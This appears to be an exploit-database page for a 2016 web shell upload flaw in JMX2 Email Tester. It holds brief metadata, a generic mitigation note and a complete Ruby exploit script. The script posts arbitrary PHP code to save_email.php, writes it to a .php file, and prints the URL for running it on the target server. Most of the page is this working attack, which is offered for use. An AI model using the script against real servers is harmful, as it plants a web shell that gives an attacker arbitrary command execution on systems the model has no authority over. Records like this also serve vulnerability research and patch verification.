JMX2 Email Tester - Web Shell Upload(save_email.php)

vendor:

JMX2 Email Tester

by:

hahwul

5.5

CVSS

MEDIUM

Web Shell Upload

434

CWE

Product Name: JMX2 Email Tester

Affected Version From: unknown

Affected Version To: unknown

Patch Exists: NO

Related CWE: none

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Debian (wheezy)

2016

JMX2 Email Tester – Web Shell Upload(save_email.php)

This exploit allows an attacker to upload a web shell using the 'save_email.php' file in the JMX2 Email Tester application. By providing a target URL and PHP code, the attacker can execute arbitrary commands on the target system.

Mitigation:

To mitigate this vulnerability, ensure that the JMX2 Email Tester application is up to date and all security patches have been applied. Additionally, restrict access to the application to trusted users only and regularly monitor for any unauthorized activity.

Source

Exploit-DB raw data:

# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
# Date: 2016-02-15
# Blog: http://www.hahwul.com
# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
# Tested on: debian [wheezy]
# CVE : none

require "net/http"
require "uri"
require 'uri-handler'

if ARGV.length != 2

puts "JMX2 Email Tester Web Shell Uploader"
puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
puts "  targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
puts "  phpCode(ex): echo 'zzzzz'"
puts "  Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
puts "  Install GEM: #> gem install uri-handler"
puts "  exploit & code by hahwul[www.hahwul.com]" 
else
target_url = ARGV[0]    # http://127.0.0.1/jmx2-Email-Tester/
shell = ARGV[1]    # PHP Code
shell = shell.to_uri
exp_url = target_url + "/models/save_email.php"
puts shell
uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)
puts exp_url
request = Net::HTTP::Post.new(uri.request_uri)
request["Accept-Encoding"] = "gzip, deflate"
request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
request["Accept"] = "application/json, text/javascript, */*; q=0.01"
request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
request["Connection"] = "keep-alive"
request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
response = http.request(request)

puts "[Result] Status code: "+response.code
puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
end